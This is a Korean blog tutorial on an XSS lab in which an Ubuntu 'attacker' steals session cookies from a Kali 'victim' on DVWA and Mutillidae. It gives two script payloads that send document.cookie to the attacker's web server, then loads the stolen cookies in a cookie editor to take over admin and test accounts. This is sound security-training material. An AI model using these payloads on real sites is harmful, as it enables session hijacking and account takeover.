본문 바로가기
인터넷 보안/실습

[인터넷 보안] XSS (Kali, Ubuntu 사용)

by 볼링치는 개발자 2021. 6. 12.
반응형

이번 포스팅에서는 공격자인 Ubuntu, 피해자인 Kali를 두고 XSS 실습을 해보겠습니다.

다음은 각 운영체제의 IP주소입니다.

Ubuntu - 192.168.0.12

Kali - 192.168.0.20

 

먼저, 사용자 Kali에서 전송해오는 내용을 받기 위해 Ubuntu에서 apache2 웹서버를 설치하고 실행시켜줍니다.

그리고 다음 명령어를 통해 apache2 웹서버의 access log를 켜 둡니다.

$ cd /var/log/apache2
$ sudo tail -f access.log

DVWA에서 실습

Kali에서 DVWA의 XSS에서 다음 스크립트를 입력해 submit 하고 실행시켜줍니다.

이 스크립트는 쿠키 정보를 공격자 PC인 Ubuntu의 IP주소로 보내라는 스크립트입니다.

<script> document.location='http://192.168.0.12/cookie?'+document.cookie </script>

그럼 Ubuntu에서 Kali에서의 접속 정보 쿠키가 log에 뜨는 것을 확인할 수 있습니다.

Ubuntu

그럼 획득한 세션 정보를 활용해보겠습니다.

Ubuntu에서 Metasploitable2의 DVWA에 접속해 아이디는 pablo, 비밀번호는 letmein으로 접속을 해줍니다.

 

그럼 현재 Ubuntu에서는 pablo로 로그인돼있고, Kali에서는 admin으로 로그인되어있습니다.

Ubuntu가 획득한 kali의 접속 세션 정보는 admin의 세션 정보입니다.

 

 

Ubuntu의 DVWA를 보면 로그인 정보가 pablo임을 확인할 수 있습니다.

 

 

그러면 Firefox의 확장 프로그램 중 cookie editor를 설치해 다음과 같이 세션 정보를 탈취해온 세션 정보를 넣고 저장을 눌러줍니다.

 

 

그리고 새로고침을 누르면 로그인 정보가 admin으로 바뀌는 것을 확인할 수 있습니다.


Mutillidae에서 실습

그럼 DVWA 말고, 다른 취약점 테스트 애플리케이션인 Mutillidae에서 실습을 진행해보겠습니다.

Mutillidae도 DVWA와 같이 Metasploitable2에 있는 오픈소스 소프트웨어입니다.

 

먼저 일반 사용자인 Kali에서 아이디는 test, 비밀번호는 123으로 아이디를 생성하고 로그인합니다.

 

 

그럼 웹사이트의 상단에서 test계정으로 로그인돼있는 것을 확인할 수 있습니다.

 

 

여기서 XSS 메뉴로 이동해 다음과 같은 스크립트를 작성하고 Lookup DNS를 눌러 스크립트를 실행해봅니다.

 

<script> document.location='http://127.0.0.1/cookie?'+document.cookie </script>

 

그럼 공격자의 PC인 Ubuntu에 로그를 확인하면 다음과 같이 username=test, uid=17, 그리고 세션 쿠키에 대한 정보를 확인할 수 있습니다.

 

 

그럼 Ubuntu의 Mutillidae에 paulkim아이디를 생성해주고 로그인합니다.

 

 

그리고 Cookie Editor를 통해 세션 쿠키 정보, uid, username정보를 습득한 정보에 따라 변경해주고 저장해줍니다.

 

 

그리고 새로고침을 하면 test 계정으로 로그인 정보가 바뀐 것을 확인할 수 있습니다.

 

반응형

'인터넷 보안 > 실습' 카테고리의 다른 글

[인터넷 보안] XSS  (0) 2021.06.12
[인터넷 보안] SQL Injection - SQL Map  (0) 2021.06.12
[인터넷 보안] SQL Injection  (0) 2021.06.11
[인터넷 보안] CSRF 공격  (0) 2021.06.11

댓글